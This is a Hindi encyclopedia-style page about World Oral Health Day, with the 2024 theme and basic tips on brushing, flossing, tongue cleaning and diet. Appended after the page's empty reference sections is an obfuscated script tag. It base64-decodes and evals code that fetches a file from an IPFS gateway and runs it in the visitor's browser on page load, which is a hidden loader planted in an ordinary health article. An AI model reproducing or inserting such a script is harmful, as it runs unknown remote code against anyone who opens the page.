विश्व मौखिक स्वास्थ्य दिवस

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 12:06, 20 मार्च 2024 का अवतरण (''''विश्व मौखिक स्वास्थ्य दिवस''' (अंग्रेज़ी: ''World Oral Health D...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

विश्व मौखिक स्वास्थ्य दिवस (अंग्रेज़ी: World Oral Health Day) प्रत्येक वर्ष 20 मार्च को मनाया जाता है। दांतों की सफाई कितनी ज्यादा जरूरी है, इससे सभी को जागरूक करने के लिए ही हर साल 'वर्ल्ड ओरल हेल्थ डे' (विश्व मौखिक स्वास्थ्य दिवस) मनाया जाता है। वैश्विक तौर पर इसे मनाया जाता है, जिसका मकसद मुंह की सही सफाई, मुंह से जुड़ी बीमारियों के खतरे को कम करना और अच्छी ओरल हेल्थ से सभी को परिचित कराना है।

थीम

साल 2024 में विश्व मौखिक स्वास्थ्य दिवस की थीम 'ए हैप्पी माउथ इज ए हैप्पी बॉडी' है। विश्व स्वास्थ्य संगठन के अनुसार, वैश्विक तौर पर मुंह से जुड़ी बीमारियों से 3.5 बिलियन लोग प्रभावित हुए हैं और यह संख्या साल 1990 से 2019 के बीच एक बिलियन तक बढ़ी है। ऐसे में मुंह की बीमारियों से बचे रहने के लिए ओरल हेल्थ का ध्यान रखना जरूरी होता है।

महत्त्वपूर्ण तथ्य

  • ओरल हेल्थ बनाए रखने के लिए रोजाना सुबह और शाम दांतों को ब्रश करना जरूरी है। मुंह में प्लाक और गंदगी जमी हो तो उसे निकालें। इसके अलावा, जब भी ब्रश करें तो दांतों के हर कोने में 2 मिनट तक मलें।
  • दांतों में कैविटी नहीं हो रही, यह सुनिश्चित करने के लिए रेग्यूलर डेंटल चेक-अप्स कराते रहें। रेग्यूलर क्लीन अप भी कराते रहना चाहिए, जिससे दांतों के किसी कोने में प्लाक या पीलापन ना जमा रहे।
  • मुंह की अच्छी सफाई के लिए दातों को माउथवॉश और फ्लॉस से साफ करें। इससे दांतों के कोनों की तो अच्छी सफाई होती ही है, साथ ही मसूड़े भी साफ रहते हैं और मुंह में जमे नुकसान पहुंचाने वाले सूक्ष्म जीवाणु भी निकल जाते हैं।
  • हेल्थी माउथ के लिए दांतों के साथ ही जीभ का सही तरह से साफ होना भी जरूरी होता है। इसके लिए टंग क्लीनर का इस्तेमाल करें। टंग क्लीनर का इस्तेमाल करने से जीभ पर जमी गंदगी हटती है। इससे मुंह से बदबू आने की दिक्कत से भी निजात मिल जाता है।
  • अपने खानपान में उन चीजों को शामिल करें जो दांतों को प्राकृतिक रूप से साफ रखती हैं, जैसे नींबू, स्ट्रॉबेरी और संतरा आदि।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>